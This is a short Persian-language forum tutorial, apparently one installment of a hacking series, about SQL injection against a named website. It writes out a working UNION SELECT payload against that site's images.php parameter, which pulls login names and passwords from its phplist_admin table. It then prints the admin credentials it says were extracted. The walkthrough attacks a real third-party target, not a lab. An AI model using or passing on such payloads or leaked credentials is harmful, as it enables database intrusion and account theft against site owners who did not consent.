مروز یه آموزش خیلی راحت براتون دارم....
اگه یادتون بیاد تا اونجا پیشرفتیم که تونستیم لیست column های موجود در table آدمین رو کش بریم
که اینا بودن "id,loginname,namelc,email,created,modified,modifi edby,password,passwordchanged,superuser,disabled"
خوب کار ما از این راحت تر نمیشد!!!
الان تنها کاری که لازمه انجام بدیم اینه که اطلاعاتی که از توی این لیست ها لازم داریم رو درخواست کنیم
برای این کار از دستوری به شکل زیر استفاده میکنیم.
http://www.coshuk.com/html/images.php?id=-27 union select 1,group_concat(loginname,char(58),password),3,4,5,6,7,8,9,10,11,12,13 from phplist_admin--
اگر دقیق به این دستور نگاه کنید میبینید که تفاوت چندانی با دستورات قبلی ما نداره و تنها کاری که من انجام دادم این بود که به دیتابیس سایت گفتم اطلاعات موجود در Loginname و password رو که توی تیبل phplist_admin هستش به من نشون بده. با دستور group_concat هم که آشنا هستید.....
تنها نکته ای که میشه اینجا اشاره کرد (char (58 هستش که دلم میخواد خودتون برین بفهمید چیه .
هرکی نفهمید پ.خ کنه تا کامل براش توضیح بدم.
دوستان ما با استفاده از باگ sql تونستیم به دیتابیس سایت نفوذ کنیم و یوزر و پسورد رو بکشیم بیرون :
"admin:coshuk,listadminassword,listadmin2assword,listadmin3assword"